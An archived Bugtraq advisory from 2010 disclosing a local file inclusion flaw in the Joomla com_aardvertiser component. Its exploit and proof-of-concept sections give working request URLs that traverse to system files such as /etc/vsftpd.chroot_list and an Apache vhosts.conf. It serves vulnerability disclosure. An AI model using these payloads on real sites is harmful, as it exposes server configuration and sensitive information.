Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Joomla Component advertising (com_aardvertiser) File Inclusion Vulnerability

From: eidelweiss () cyberservices com
Date: Thu, 13 May 2010 09:59:28 -0600
Description
A vulnerability has been discovered in the advertising component for Joomla, which can be exploited by malicious people 
to disclose potentially sensitive information.

Input passed to the '"task" parameter in index.php (when "option" is set to "com_aardvertiser") is not properly 
verified before being used to include files. This can be exploited to include arbitrary files from local resources via 
directory traversal attacks.

The vulnerability is confirmed in Joomla 1.5 com_aardvertiser V2.0.

Impact : Exposure of system information
              Exposure of sensitive information
Where :  From remote 

        -=[Exploit]=-

        http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task= [lfi]
        http://localhost/index.php?option=com_aardvertiser&task= [lfi]

        -=[LFI]=-

        /etc/vsftpd.chroot_list
        /usr/local/etc/apache/vhosts.conf

        -=[ P0C ]=-

        http://localhost/index.php?option=com_aardvertiser&cat_name=conf&task=/usr/local/etc/apache/vhosts.conf
        http://localhost/index.php?option=com_aardvertiser&task=/etc/vsftpd.chroot_list

=========================| -=[ E0F ]=- |=================================
Previous By Date Next
Previous By Thread Next

Current thread: